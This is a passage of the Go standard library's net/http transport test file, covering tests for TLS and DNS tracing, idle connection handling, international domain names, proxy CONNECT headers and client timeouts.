4965 nc.Write([]byte("HTTP/1.1 200 OK\r\n\r\n"))
4966 // Switch to a little protocol that capitalize its input lines:
4967 for {
4968 line, err := brw.ReadString('\n')
4969 if err != nil {
4970 if err != io.EOF {
4971 t.Error(err)
4972 }
4973 return
4974 }
4975 io.WriteString(brw, strings.ToUpper(line))
4976 brw.Flush()
4977 }
4978 }))
4979 defer cst.close()
4980 pr, pw := io.Pipe()
4981 defer pw.Close()
4982 req, err := NewRequest("CONNECT", cst.ts.URL, pr)
4983 if err != nil {
4984 t.Fatal(err)
4985 }
4986 req.URL.Opaque = target
4987 res, err := cst.c.Do(req)
4988 if err != nil {
4989 t.Fatal(err)
4990 }
4991 defer res.Body.Close()
4992 if res.StatusCode != 200 {
4993 t.Fatalf("status code = %d; want 200", res.StatusCode)
4994 }
4995 br := bufio.NewReader(res.Body)
4996 for _, str := range []string{"foo", "bar", "baz"} {
4997 fmt.Fprintf(pw, "%s\n", str)
4998 got, err := br.ReadString('\n')
4999 if err != nil {
5000 t.Fatal(err)
5001 }
5002 got = strings.TrimSpace(got)
5003 want := strings.ToUpper(str)
5004 if got != want {
5005 t.Fatalf("got %q; want %q", got, want)
5006 }
5007 }
5008 }
5009
5010 func TestTransportRequestReplayable(t *testing.T) {
5011 someBody := ioutil.NopCloser(strings.NewReader(""))
5012 tests := []struct {
5013 name string
5014 req *Request
5015 want bool
5016 }{
5017 {
5018 name: "GET",
5019 req: &Request{Method: "GET"},
5020 want: true,
5021 },
5022 {
5023 name: "GET_http.NoBody",
5024 req: &Request{Method: "GET", Body: NoBody},
5025 want: true,
5026 },
5027 {
5028 name: "GET_body",
5029 req: &Request{Method: "GET", Body: someBody},
5030 want: false,
5031 },
5032 {
5033 name: "POST",
5034 req: &Request{Method: "POST"},
5035 want: false,
5036 },
5037 {
5038 name: "POST_idempotency-key",
5039 req: &Request{Method: "POST", Header: Header{"Idempotency-Key": {"x"}}},
5040 want: true,
5041 },
5042 {
5043 name: "POST_x-idempotency-key",
5044 req: &Request{Method: "POST", Header: Header{"X-Idempotency-Key": {"x"}}},
5045 want: true,
5046 },
5047 {
5048 name: "POST_body",
5049 req: &Request{Method: "POST", Header: Header{"Idempotency-Key": {"x"}}, Body: someBody},
5050 want: false,
5051 },
5052 }
5053 for _, tt := range tests {
5054 t.Run(tt.name, func(t *testing.T) {
5055 got := tt.req.ExportIsReplayable()
5056 if got != tt.want {
5057 t.Errorf("replyable = %v; want %v", got, tt.want)
5058 }
5059 })
5060 }
5061 }
5062
View as plain text
|
__label__pos
| 0.97577 |
Forum > GTK
GTK2 app takes 10 seconds to close
(1/1)
AlexTP:
Gtk2 app took 20+ seconds to start and shows empty window. I gave to user this wiki info:
https://wiki.freepascal.org/CudaText#Unix:_Program_takes_60_seconds_to_start
It solved the slow start!
But, app still waits 10 seconds on closing.
Right before it finally closes it logs this:
--- Quote ---(cudatext:276516): GLib-CRITICAL **: 16:33:07.945: Source ID 394 was not found when attempting to remove it
--- End quote ---
jamie:
and here I was in the thinking stage of tooling up a fast PC for linux!, should I stay away at least for another year?
AlexTP:
That error is hard to reproduce (I cannot), so use the Linux before you see that error.
Navigation
[0] Message Index
Go to full version
|
__label__pos
| 0.583144 |
# /etc/rsyslog.conf Configuration file for rsyslog. # # For more information see # /usr/share/doc/rsyslog-doc/html/rsyslog_conf.html ################# #### MODULES #### ################# $ModLoad imuxsock # provides support for local system logging $ModLoad imklog # provides kernel logging support #$ModLoad immark # provides --MARK-- message capability # provides UDP syslog reception #$ModLoad imudp #$UDPServerRun 514 # provides TCP syslog reception #$ModLoad imtcp #$InputTCPServerRun 514 ########################### #### GLOBAL DIRECTIVES #### ########################### # # Use traditional timestamp format. # To enable high precision timestamps, comment out the following line. # $ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat # # Set the default permissions for all log files. # $FileOwner root $FileGroup adm $FileCreateMode 0640 $DirCreateMode 0755 $Umask 0022 # # Where to place spool and state files # $WorkDirectory /var/spool/rsyslog # # Include all config files in /etc/rsyslog.d/ # $IncludeConfig /etc/rsyslog.d/*.conf ############### #### RULES #### ############### # # First some standard log files. Log by facility. # auth,authpriv.* /var/log/auth.log *.*;auth,authpriv.none -/var/log/syslog #cron.* /var/log/cron.log daemon.* -/var/log/daemon.log kern.* -/var/log/kern.log lpr.* -/var/log/lpr.log mail.* -/var/log/mail.log user.* -/var/log/user.log # # Logging for the mail system. Split it up so that # it is easy to write scripts to parse these files. # mail.info -/var/log/mail.info mail.warn -/var/log/mail.warn mail.err /var/log/mail.err # # Logging for INN news system. # news.crit /var/log/news/news.crit news.err /var/log/news/news.err news.notice -/var/log/news/news.notice # # Some "catch-all" log files. # *.=debug;\ auth,authpriv.none;\ news.none;mail.none -/var/log/debug *.=info;*.=notice;*.=warn;\ auth,authpriv.none;\ cron,daemon.none;\ mail,news.none -/var/log/messages # # Emergencies are sent to everybody logged in. # *.emerg * # # I like to have messages displayed on the console, but only on a virtual # console I usually leave idle. # #daemon,mail.*;\ # news.=crit;news.=err;news.=notice;\ # *.=debug;*.=info;\ # *.=notice;*.=warn /dev/tty8 # The named pipe /dev/xconsole is for the `xconsole' utility. To use it, # you must invoke `xconsole' with the `-file' option: # # $ xconsole -file /dev/xconsole [...] # # NOTE: adjust the list below, or you'll go crazy if you have a reasonably # busy site.. # daemon.*;mail.*;\ news.err;\ *.=debug;*.=info;\ *.=notice;*.=warn |/dev/xconsole
|
__label__pos
| 0.829338 |
What does the map method do in Python
0 votes
What is the purpose of using map() function?
Jun 17, 2019 in Python by Wajiha
• 1,950 points
596 views
1 answer to this question.
0 votes
The map() function in Python is a function that applies a given function to all the iterables and returns a new list.
SYNTAX:
map(function, iterable)
Let’s take an example to demonstrate the use of the lambda functions within the map() function:
EXAMPLE:
1
2
3
my_list = [2,3,4,5,6,7,8]
new_list = list(map(lambda a: (a/3 != 2), li))
print(new_list)
OUTPUT:
[True, True, True, True, False, True, True]
The above output shows that, whenever the value of the iterables is not equal to 2 when divided by 3, the result returned should be True. Hence, for all elements in my_list, it returns true except for the value 6 when the condition changes to False.
answered Jun 17, 2019 by anonymous
Related Questions In Python
+1 vote
1 answer
What does the Raise keyword do in Python?
Hi! I think I can answer this - ...READ MORE
answered Jan 25, 2019 in Python by Nymeria
• 3,560 points
882 views
0 votes
1 answer
What does the penup() do in Python(turtle module)
penup() basically makes sure that the moving ...READ MORE
answered Jun 21, 2019 in Python by Iris
5,894 views
0 votes
1 answer
What does the operator "/=" do in python?
x = 20 res = x /= 5 print(res) The ...READ MORE
answered Aug 2, 2019 in Python by Mohammad
• 3,230 points
669 views
0 votes
1 answer
What does the dir() function do in python?
The dir() function returns all properties and methods of ...READ MORE
answered Aug 6, 2019 in Python by Mohammad
• 3,230 points
768 views
0 votes
2 answers
+1 vote
2 answers
how can i count the items in a list?
Syntax : list. count(value) Code: colors = ['red', 'green', ...READ MORE
answered Jul 7, 2019 in Python by Neha
• 330 points
edited Jul 8, 2019 by Kalgi 4,066 views
0 votes
1 answer
0 votes
1 answer
What does the return statement do in Python?
The print() function is use to write ...READ MORE
answered Oct 1, 2018 in Python by SDeb
• 13,300 points
1,085 views
0 votes
1 answer
What does the random.triangular(low, high, mode) function do in python?
It returns a random floating point number ...READ MORE
answered May 27, 2019 in Python by Vinod
932 views
webinar REGISTER FOR FREE WEBINAR X
REGISTER NOW
webinar_success Thank you for registering Join Edureka Meetup community for 100+ Free Webinars each month JOIN MEETUP GROUP
|
__label__pos
| 0.906862 |
Virtual Disk Image
What Does Virtual Disk Image Mean?
A virtual disk image (VDI) is the image of a virtual hard disk or the logical disk associated with a virtual machine.
Advertisements
It is used in virtualization environments to create a replica of the disk space/drive assigned to one or more virtual machines.
Techopedia Explains Virtual Disk Image
VDI is primarily a method to create a copy/image/replica of a virtual machine’s hard disk to be later used for disk backup, restoration or copying to a new virtual machine. The VDI captures and stores all information on the primary disk, typically excluding the operating system files and the virtual machine itself.
In addition to being a disk image of a virtual hard disk, a virtual disk image can also refer to the disk image of a CD, DVD or any other optical disk.
Advertisements
Related Terms
Latest Cloud Computing Terms
Related Reading
Margaret Rouse
Margaret Rouse is an award-winning technical writer and teacher known for her ability to explain complex technical subjects to a non-technical, business audience. Over the past twenty years her explanations have appeared on TechTarget websites and she's been cited as an authority in articles by the New York Times, Time Magazine, USA Today, ZDNet, PC Magazine and Discovery Magazine.Margaret's idea of a fun day is helping IT and business professionals learn to speak each other’s highly specialized languages. If you have a suggestion for a new definition or how to improve a technical explanation, please email Margaret or contact her…
|
__label__pos
| 0.566457 |
Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
344 lines (291 sloc) 11 KB
require 'uri'
require 'rack'
require 'rack/mock_session'
require 'rack/test/cookie_jar'
require 'rack/test/mock_digest_request'
require 'rack/test/utils'
require 'rack/test/methods'
require 'rack/test/uploaded_file'
require 'rack/test/version'
module Rack
module Test
DEFAULT_HOST = 'example.org'.freeze
MULTIPART_BOUNDARY = '----------XnJLe9ZIbbGUYtzPQJ16u1'.freeze
# The common base class for exceptions raised by Rack::Test
class Error < StandardError; end
# This class represents a series of requests issued to a Rack app, sharing
# a single cookie jar
#
# Rack::Test::Session's methods are most often called through Rack::Test::Methods,
# which will automatically build a session when it's first used.
class Session
extend Forwardable
include Rack::Test::Utils
def_delegators :@rack_mock_session, :clear_cookies, :set_cookie, :last_response, :last_request
# Creates a Rack::Test::Session for a given Rack app or Rack::MockSession.
#
# Note: Generally, you won't need to initialize a Rack::Test::Session directly.
# Instead, you should include Rack::Test::Methods into your testing context.
# (See README.rdoc for an example)
def initialize(mock_session)
@headers = {}
@env = {}
@digest_username = nil
@digest_password = nil
@rack_mock_session = if mock_session.is_a?(MockSession)
mock_session
else
MockSession.new(mock_session)
end
@default_host = @rack_mock_session.default_host
end
# Issue a GET request for the given URI with the given params and Rack
# environment. Stores the issues request object in #last_request and
# the app's response in #last_response. Yield #last_response to a block
# if given.
#
# Example:
# get "/"
def get(uri, params = {}, env = {}, &block)
custom_request('GET', uri, params, env, &block)
end
# Issue a POST request for the given URI. See #get
#
# Example:
# post "/signup", "name" => "Bryan"
def post(uri, params = {}, env = {}, &block)
custom_request('POST', uri, params, env, &block)
end
# Issue a PUT request for the given URI. See #get
#
# Example:
# put "/"
def put(uri, params = {}, env = {}, &block)
custom_request('PUT', uri, params, env, &block)
end
# Issue a PATCH request for the given URI. See #get
#
# Example:
# patch "/"
def patch(uri, params = {}, env = {}, &block)
custom_request('PATCH', uri, params, env, &block)
end
# Issue a DELETE request for the given URI. See #get
#
# Example:
# delete "/"
def delete(uri, params = {}, env = {}, &block)
custom_request('DELETE', uri, params, env, &block)
end
# Issue an OPTIONS request for the given URI. See #get
#
# Example:
# options "/"
def options(uri, params = {}, env = {}, &block)
custom_request('OPTIONS', uri, params, env, &block)
end
# Issue a HEAD request for the given URI. See #get
#
# Example:
# head "/"
def head(uri, params = {}, env = {}, &block)
custom_request('HEAD', uri, params, env, &block)
end
# Issue a request to the Rack app for the given URI and optional Rack
# environment. Stores the issues request object in #last_request and
# the app's response in #last_response. Yield #last_response to a block
# if given.
#
# Example:
# request "/"
def request(uri, env = {}, &block)
uri = parse_uri(uri, env)
env = env_for(uri, env)
process_request(uri, env, &block)
end
# Issue a request using the given verb for the given URI. See #get
#
# Example:
# custom_request "LINK", "/"
def custom_request(verb, uri, params = {}, env = {}, &block)
uri = parse_uri(uri, env)
env = env_for(uri, env.merge(method: verb.to_s.upcase, params: params))
process_request(uri, env, &block)
end
# Set a header to be included on all subsequent requests through the
# session. Use a value of nil to remove a previously configured header.
#
# In accordance with the Rack spec, headers will be included in the Rack
# environment hash in HTTP_USER_AGENT form.
#
# Example:
# header "User-Agent", "Firefox"
def header(name, value)
if value.nil?
@headers.delete(name)
else
@headers[name] = value
end
end
# Set an env var to be included on all subsequent requests through the
# session. Use a value of nil to remove a previously configured env.
#
# Example:
# env "rack.session", {:csrf => 'token'}
def env(name, value)
if value.nil?
@env.delete(name)
else
@env[name] = value
end
end
# Set the username and password for HTTP Basic authorization, to be
# included in subsequent requests in the HTTP_AUTHORIZATION header.
#
# Example:
# basic_authorize "bryan", "secret"
def basic_authorize(username, password)
encoded_login = ["#{username}:#{password}"].pack('m0')
header('Authorization', "Basic #{encoded_login}")
end
alias authorize basic_authorize
# Set the username and password for HTTP Digest authorization, to be
# included in subsequent requests in the HTTP_AUTHORIZATION header.
#
# Example:
# digest_authorize "bryan", "secret"
def digest_authorize(username, password)
@digest_username = username
@digest_password = password
end
# Rack::Test will not follow any redirects automatically. This method
# will follow the redirect returned (including setting the Referer header
# on the new request) in the last response. If the last response was not
# a redirect, an error will be raised.
def follow_redirect!
unless last_response.redirect?
raise Error, 'Last response was not a redirect. Cannot follow_redirect!'
end
request_method, params =
if last_response.status == 307
[last_request.request_method.downcase.to_sym, last_request.params]
else
[:get, {}]
end
# Compute the next location by appending the location header with the
# last request, as per https://tools.ietf.org/html/rfc7231#section-7.1.2
# Adding two absolute locations returns the right-hand location
next_location = URI.parse(last_request.url) + URI.parse(last_response['Location'])
send(
request_method, next_location.to_s, params,
'HTTP_REFERER' => last_request.url,
'rack.session' => last_request.session,
'rack.session.options' => last_request.session_options
)
end
private
def parse_uri(path, env)
URI.parse(path).tap do |uri|
uri.path = "/#{uri.path}" unless uri.path[0] == '/'
uri.host ||= @default_host
uri.scheme ||= 'https' if env['HTTPS'] == 'on'
end
end
def env_for(uri, env)
env = default_env.merge(env)
env['HTTP_HOST'] ||= [uri.host, (uri.port if uri.port != uri.default_port)].compact.join(':')
env.update('HTTPS' => 'on') if URI::HTTPS === uri
env['HTTP_X_REQUESTED_WITH'] = 'XMLHttpRequest' if env[:xhr]
# TODO: Remove this after Rack 1.1 has been released.
# Stringifying and upcasing methods has be commit upstream
env['REQUEST_METHOD'] ||= env[:method] ? env[:method].to_s.upcase : 'GET'
params = env.delete(:params) do {} end
if env['REQUEST_METHOD'] == 'GET'
# merge :params with the query string
if params
params = parse_nested_query(params) if params.is_a?(String)
uri.query = [uri.query, build_nested_query(params)].compact.reject { |v| v == '' }.join('&')
end
elsif !env.key?(:input)
env['CONTENT_TYPE'] ||= 'application/x-www-form-urlencoded'
if params.is_a?(Hash)
if data = build_multipart(params)
env[:input] = data
env['CONTENT_LENGTH'] ||= data.length.to_s
env['CONTENT_TYPE'] = "#{multipart_content_type(env)}; boundary=#{MULTIPART_BOUNDARY}"
else
# NB: We do not need to set CONTENT_LENGTH here;
# Rack::ContentLength will determine it automatically.
env[:input] = params_to_string(params)
end
else
env[:input] = params
end
end
set_cookie(env.delete(:cookie), uri) if env.key?(:cookie)
Rack::MockRequest.env_for(uri.to_s, env)
end
def multipart_content_type(env)
requested_content_type = env['CONTENT_TYPE']
if requested_content_type.start_with?('multipart/')
requested_content_type
else
'multipart/form-data'
end
end
def process_request(uri, env)
@rack_mock_session.request(uri, env)
if retry_with_digest_auth?(env)
auth_env = env.merge('HTTP_AUTHORIZATION' => digest_auth_header,
'rack-test.digest_auth_retry' => true)
auth_env.delete('rack.request')
process_request(uri, auth_env)
else
yield last_response if block_given?
last_response
end
end
def digest_auth_header
challenge = last_response['WWW-Authenticate'].split(' ', 2).last
params = Rack::Auth::Digest::Params.parse(challenge)
params.merge!('username' => @digest_username,
'nc' => '00000001',
'cnonce' => 'nonsensenonce',
'uri' => last_request.fullpath,
'method' => last_request.env['REQUEST_METHOD'])
params['response'] = MockDigestRequest.new(params).response(@digest_password)
"Digest #{params}"
end
def retry_with_digest_auth?(env)
last_response.status == 401 &&
digest_auth_configured? &&
!env['rack-test.digest_auth_retry']
end
def digest_auth_configured?
@digest_username
end
def default_env
{ 'rack.test' => true, 'REMOTE_ADDR' => '127.0.0.1' }.merge(@env).merge(headers_for_env)
end
def headers_for_env
converted_headers = {}
@headers.each do |name, value|
env_key = name.upcase.tr('-', '_')
env_key = 'HTTP_' + env_key unless env_key == 'CONTENT_TYPE'
converted_headers[env_key] = value
end
converted_headers
end
def params_to_string(params)
case params
when Hash then build_nested_query(params)
when nil then ''
else params
end
end
end
def self.encoding_aware_strings?
defined?(Encoding) && ''.respond_to?(:encode)
end
end
end
You can’t perform that action at this time.
|
__label__pos
| 0.912922 |
Explanations & Tutorials
IoT Explained - How Does an IoT System Actually Work? - Part 2
IoT resources are often highly technical and confusing, so for many it isn't clear how an IoT system actually works.
Calum McClelland
In the first part of IoT Explained - How Does an IoT System Actually Work?, I explained that there are four major components that are involved in any given IoT system. Those components are Sensors/Devices, Connectivity, Data Processing, and User Interface.
Here’s a quick recap of how they work together:
An IoT system consists of sensors/devices which “talk” to the cloud through some kind of connectivity. Once the data gets to the cloud, software processes it and then might decide to perform an action, such as sending an alert or automatically adjusting the sensors/devices without the need for the user.
But if the user input is needed or if the user simply wants to check in on the system, a user interface allows them to do so. Any adjustments or actions that the user makes are then sent in the opposite direction through the system: from the user interface, to the cloud, and back to the sensors/devices to make some kind of change.
IoT Explained: Skipping the Connectivity
The Internet of Things is made up of connected devices, i.e. anything that has the capacity to transfer data over a network. So by definition, an IoT system needs some kind of connectivity, especially if it uses the cloud.
However, there are certain cases where the data processing or the interaction with the sensor/device through the user interface can take place without any data first being transferred over an external network.
Why Skip the Connectivity?
One reason is latency. Latency refers to how long it takes for a packet of data to get from the start point to the end point. Although latency doesn’t matter in the vast majority cases, for some IoT applications latency is critical.
Imagine you’re in a self-driving car and suddenly somebody loses control of their car in front of you. Would you want to wait for the self-driving car to send data to the cloud, have that data processed, then have instructions for what to do sent back to the car? No! Those milliseconds could mean life or death.
Even if you’re the one driving the car, you want the user interface (i.e the steering wheel) directly hooked up to the device (i.e the car) rather than waiting for your input to be transmitted externally, processed, and then sent back.
Another reason is that sending lots of data can become really expensive. Some IoT applications collect a ton of data but only a small fraction is actually important. Local algorithms can restrict what gets sent thus lowering costs.
A good example is a security camera. Streaming video takes a lot of data, but the vast majority of the footage might be of an empty hallway.
So How Do You Skip the Connectivity?
Rather than send data over a network for it to be processed in the cloud, an alternative approach is to process the data on a gateway (what’s a gateway?) or on the sensor/device itself. This is called either fog computing or edge computing (because you’re bringing the cloud “closer to the ground” and the computing is taking place at the edges of the IoT system rather than the center).
For the security camera, it could use machine vision to “watch” for anything abnormal and only then send that footage to the cloud.
For the self-driving car, the data processing all takes place in the onboard computer which allows for faster decision-making.
IoT systems are Complex and Varied
Every IoT system combines the four components I discussed in Part 1, Sensors/Devices, Connectivity, Data Processing, and User Interface. However, as you’ve seen in this IoT Explained Part 2, a specific IoT system can combine these components in different ways. It all comes down the specific situation that needs to be addressed.
Ultimately, IoT systems are meant to improve our everyday experiences and improve our efficiency in whatever way possible. And now you know how an IoT system actually works!
Calum McClelland
VP, Operations & Projects
Calum is VP Operations & Projects at Leverege and graduated from Brown University in May 2016 with a major in Philosphy. Striving to change himself and the world for the better, Calum values active living, life-long learning, and keeping an open mind.
View Profile
More From the Blog
|
__label__pos
| 0.70983 |
How to trigger buttons after typing something with enter in toast notifications uwp
Alumni Comp 16 LAXMI SWAMI 46 Reputation points
2021-01-28T11:48:19.963+00:00
In quick reply toast notification if i write a quick reply and want to send it, I have to to press reply after having typed, is it possible to make 'Enter' trigger that button?
Also is it possible to disable a button once the user types anything in the reply textbox?
Universal Windows Platform (UWP)
0 comments No comments
{count} votes
1 answer
Sort by: Most helpful
1. AryaDing-MSFT 2,916 Reputation points
2021-01-29T06:01:16.753+00:00
Hi,
Welcome to Microsoft Q&A!
Windows toast notifications use Ctrl+Enter to perform the quick reply and use Enter to add a new line.
Currently, uwp does not provide a way to change it.
Update:
ToastButton.TextBoxId can get or set the ID of an existing ToastTextBox in order to have this button display to the right of the input, achieving a quick reply scenario.
So, this quick reply function depends on you using ToastButton.TextBoxId to make the button behave as a quick reply button. You could set the same Id for the textbox and the button.
For example(ToastButton.TextBoxId and ToastTextBox.Id in the code below are the same, both are "tbReply"):
ToastActionsCustom actions = new ToastActionsCustom()
{
Inputs =
{
new ToastTextBox("tbReply")
{
PlaceholderContent = "Type a response"
}
},
Buttons =
{
new ToastButton("Reply", new QueryString()
{
{ "action", "reply" },
{ "conversationId", conversationId.ToString() }
}.ToString())
{
ActivationType = ToastActivationType.Background,
ImageUri = "Assets/Reply.png",
// Reference the text box's ID in order to quick reply
TextBoxId = "tbReply"
},
……
}
};
If the response is helpful, please click "Accept Answer" and upvote it.
Note: Please follow the steps in our documentation to enable e-mail notifications if you want to receive the related email notification for this thread.
|
__label__pos
| 0.992185 |
on news channels when theyre asking questions why do they pause and leave like a awkward silence?
596 views
on news channels when theyre asking questions why do they pause and leave like a awkward silence?
In: Other
This is a delay in the satellite link between the TV studio where the host is located, and the remote location where the answerer is.
Mostly it’s due to a delay in the signal going from the station to the reporter. Along with that, the reporter might also be taking a second to process what was said to be able to respond accurately
This only occurs when their correspondents are at a remote location, it’s due to the delay between the video feed that the studio receives and what the remote team receives. So it’s basically like you talking to your friend through the phone, and it takes 3 seconds for your voice to reach your friend and vice versa. So 3 seconds for the message to get to you, and a couple of seconds to come up with a response.
|
__label__pos
| 0.999946 |
93615441525
academy
Security
Security
See all Security articles
Privacy
Privacy
See all Privacy articles
Performance
Performance
See all Performance articles
Select language
Select language
Avast Academy Security Other Threats What Is Web 3.0 (Web3 definition)?
What Is Web 3.0 (Web3 definition)?
Web 3.0, or Web3, is a set of values and technical applications that define a new era of the World Wide Web. Prime Web 3.0 examples include ubiquity, decentralization, artificial intelligence, blockchain, and connectivity. Learn more about what Web 3.0 means and its key features. Then, get the digital protection you need for your connected life with Avast One.
PC-editors-choice-icon
Editors' choice
AV-Test-Top-product-icon
2022
Top Rated
Product
Academy-What-Is-Web-3-0-Hero
Web 3.0 gets it. It understands what you mean and the context around how you navigate the web, and it can assemble information in a way similar to humans. Web 3.0 technologies can read between the lines to decipher the intent behind your online requests. According to Web 3.0’s supporters, those deeper insights will transform our digital lives.
But what is Web 3.0, exactly? Let's start at the beginning, with the launch of the World Wide Web, also known as Web 1.0.
Hamburguer menu icon
This article contains:
Definition of Web 3.0, 2.0, and 1.0
Web 1.0 is the text-based or read-only web, Web 2.0 is the participatory or social web, and Web 3.0 is the open, decentralized, and immersive web.
Web 1.0 was the foundation of the web, and it consisted of static text and images. The next generation, Web 2.0, was defined by interaction and social media. Web 3.0 is the third iteration of the web, defined by open technologies like blockchain and immersive experiences like the metaverse.
Web 1.0
From the early days of static web pages (Web 1.0), to the two-way flow of information (Web 2.0), to the emerging decentralized open internet (Web 3.0), each successive generation of the web has built on top of the previous one, with engineers, designers, and users taking part in defining Web 1.0, 2.0, and 3.0.
The first iteration of the World Wide Web emerged in the late 1980s and early 1990s out of the need for better data sharing among the scientific community. The term “read-only web” was coined by Tim Berners-Lee, because while Web 1.0 made it much easier to exchange information, you couldn’t interact with websites, you could only read them.
The defining characteristic of Web 1.0 was static web pages with no interactivity. You went to a website and read information — the experience was passive. You can see the very first web page of Web 1.0 here.
Web 2.0
Web 2.0 emerged in the early 2000s, taking shape with the emergence of social media. Web 2.0 created spaces for sharing and interactivity, ushering in a new model far beyond the limitations of static web pages.
The defining difference between Web 1 vs Web 2 is the two-way flow of information. People started interacting with websites by sharing information or creating their own content. Think of platforms like Amazon, Google, Facebook, and Twitter, as well as online shopping sites, web forums, P2P gaming sites, and other social media.
What is Web 3.0, exactly?
Web 3.0, also known as Web3, is the third generation of the World Wide Web. Web 3.0 is meant to be decentralized, open to everyone (with a bottom-up design), and built on top of blockchain technologies and developments in the Semantic Web, which describes the web as a network of meaningfully linked data.
Web 3.0 is based on a specific set of principles, technical parameters, and values that distinguish it from earlier iterations of the World Wide Web: Web 2.0 and Web 1.0. Web 3.0 envisions a world without centralized companies, where people are in control of their own data and transactions are transparently recorded on blockchains, or databases searchable by anyone.
Web 2.0 vs Web 3.0
The main distinctions between Web 2.0 and Web 3.0 involve data storage, connectivity, currency, and decentralization. Web 2.0 is about creating content and interacting with websites. Web 3.0 means immersing yourself in the digital experience, and it involves concepts like individual control of personal data, cryptocurrency, and decentralized record keeping on the blockchain.
Whereas Web 2.0 operates on fiat money, Web 3.0 relies on cryptocurrencies and a decentralized finance (DeFi) model. This is part of the decentralization objective, which shifts control from centralized companies or governments to users or the collective. The premise of decentralization extends beyond currency, covering everything from apps to data.
Performance-wise, Web 3.0 will likely be slower than Web 2.0, at least at the beginning. That’s because transactions are processed over multiple servers (independently operated), instead of on one or a group of centralized servers.
It appears that we’re now in the process of moving from Web 2.0 to Web 3.0. In fact, some people say that we’re already living in Web 3.0.
Features of Web 3.0
Web 3.0 is explained best through its features, namely ubiquity, decentralization, artificial intelligence, and semantic web interactivity. Some Web 3.0 technologies have already emerged, such as the decentralized concept that underpins blockchain. Other Web 3.0 meanings are yet to be understood, let alone created.
Blockchain technology was created to facilitate cryptocurrency — the digital currencies that are decentralized (not controlled by central banks) and that are set to play a large role in Web 3.0. Known as Web 3.0 cryptos, these currencies — and other digital assets like NFTs — will be used to incentivize users and service providers, letting people transact directly with one another without having to go through third-parties like conventional banks.
Illustration of the blockchain process, highlighting how each step is linked to the next
Ubiquity
Ubiquity means appearing everywhere or being very common. The definition of ubiquity in terms of Web 3.0 refers to the idea that the internet should be accessible from anywhere, through any platform, on any device. Along with digital ubiquity comes the idea of equality. If Web 3.0 is ubiquitous, it means it is not limited. Web 3.0 is not meant for the few, it is meant for the many.
In Web 3.0, anyone can engage from anywhere, and they can contribute through open-source software. Web 2.0 touched on this with the advent of smartphones and greater internet access. If a user posts something on social media, it is essentially “everywhere.” With new gadgets and technology on the horizon, this real-time global connectivity will continue to gain momentum.
Decentralization
Web 3.0 envisions a truly decentralized internet, where connectivity is based completely on peer-to-peer network connections. This decentralized web will rely on blockchain to store data and maintain digital assets without being tracked.
Decentralized apps (Dapps) are also developed based on this concept. Instead of being maintained by a single server, decentralized apps are maintained by a network of computers. Some Dapps already exist using core Web 3.0 technologies.
Decentralized finance (DeFi) is central to DApps and shares many of cryptocurrency’s characteristics, but its applications are even wider. DeFi enables users to invest, save, and ultimately replace pre-existing financial institutions and their top-down modus operandi.
Artificial intelligence
Web 3.0 leans on artificial intelligence (AI) to develop computers that can understand the meaning or context of user requests and answer complex requests more quickly. The artificial intelligence of the Web 3.0 era goes beyond the interactivity of Web 2.0 and creates experiences for people that feel curated, seamless, and intuitive — a central aim behind the development of the metaverse.
Part of AI is machine learning and applying techniques like predictive analytics to outline relationships and patterns that help predict future outcomes and events. Whereas machine learning is passive, AI requires an agent to learn and interact with the environment.
From a user perspective, advancements in machine learning could lead to better customer support. Increasingly intelligent chatbots will be able to support multiple consumers at once, with far more accuracy than current standards. This advanced technology will also deliver ideal search results, identify fake news, and select high-quality content.
Screenshot of the Mailchimp chatbot pop-up box that allows you to type a question and get automated responses
Semantic Web
Semantic means “relating to meaning in language or logic.” The Semantic Web improves the abilities of web technologies to generate, share, and connect content through search and analysis by understanding the meaning of language beyond simple keywords.
Websites of the 2.0 era have been created primarily for humans to read, with increased consideration for search engine understanding. Web 3.0 uses ideas of the Semantic Web as a springboard to take readability, creativity, and interactivity to another level.
Under Web 3.0, search engine, platform, and connectivity capabilities will skyrocket. Rather than discerning meaning from a series of ones and zeros, keywords, headers, links, and other metadata, computers will be able to understand context and identify your true needs and goals.
Is Web 3.0 the same as the Semantic Web?
No, web 3.0 is not the same as the Semantic Web. The two concepts are connected but not interchangeable. Web 3.0 is based on the notion of the Semantic Web, but it is not the Semantic Web itself.
The definition of the Semantic Web came about in 2006 from Tim Berners-Lee, computer scientist and inventor of the World Wide Web. His definition of the Semantic Web speaks of a future version of the web as an “integrated huge space of data” and “unbelievable data resource.”
Web 3.0 captures these ideas from the Semantic Web and evolves into something much bigger, integrating more diverse features such as AI, machine learning, decentralization, and peer-to-peer networks.
3D Graphics
Web 3.0 addresses the user experience on several levels, including the front-end experience, or how we take in what we see on our screens. 3D design is often used in websites and services in Web 3.0. The most common examples of it can be found in eCommerce, real estate, computer games, and virtual museum tours.
A 3D-rendered kitchen lets viewers imagine what it will look like when built.
Examples of Web 3.0 applications
Web 3.0 applications incorporate AI and machine learning technology. Most of the Web 3.0 apps that are already live today involve cryptocurrency and finance. In the future, all types of apps will be created, making them smarter and more user-centric.
Siri is a good example of an app employing Web 3.0 technology. Apple’s AI assistant lets users control their surroundings and devices with voice commands. Another popular Web 3.0 app currently in use is the web browser Brave, which connects participants with Dapps, their crypto wallets, and other Web 3.0 technology.
Risks or downsides of Web 3.0
The lack of centralized gatekeepers in Web 3.0 could pose a significant risk to users. While Web 3.0’s decentralized ownership is seen to empower individuals, the lack of oversight can increase consumer risk, as was seen in the collapse of the major cryptocurrency exchange FTX.
Decentralization could make regulating Web 3.0 virtually impossible. And with the rapid increase of the amount of information stored on the web and additional interactions and transactions, unauthorized access to personal data could have devastating consequences.
There will also be new types of cyber attacks to contend with. Ice fishing and other FinTech hacks already exist, and novel cybersecurity threats will continue to emerge. More generally, widespread data manipulation could lead to disinformation. If all users are anonymous in the new world, this includes those with bad intentions. Holding people accountable for attacks and data manipulation will become even more complicated.
Aside from security threats, Web 3.0 consumes a lot of energy resources due to its reliance on blockchain technology. Mining cryptocurrency, DeFi transactions, and the decentralization of data require a huge amount of power to operate, which will put even more stress on global energy systems.
Examples of Web 3.0 in real life
Web 3.0 websites and Web 3.0 apps are already here. You've likely heard of them in the media, such as the costly examples of cryptojacking. Or, you may have already interacted with Web 3.0 applications, such as an Internet of Things appliance. Perhaps you’ve even explored the possibilities and meaning of the Metaverse. You may have been exposed to examples of Web 3.0 without even knowing it.
A woman's hand adjusting smart home appliances from the control panel.
The unprecedented levels of interactivity will drive the need for broader awareness of the security risks of IoT. In mere decades, the world has moved from static Web 1.0 apps and websites to dynamic models and emerging Web 3.0 technology.
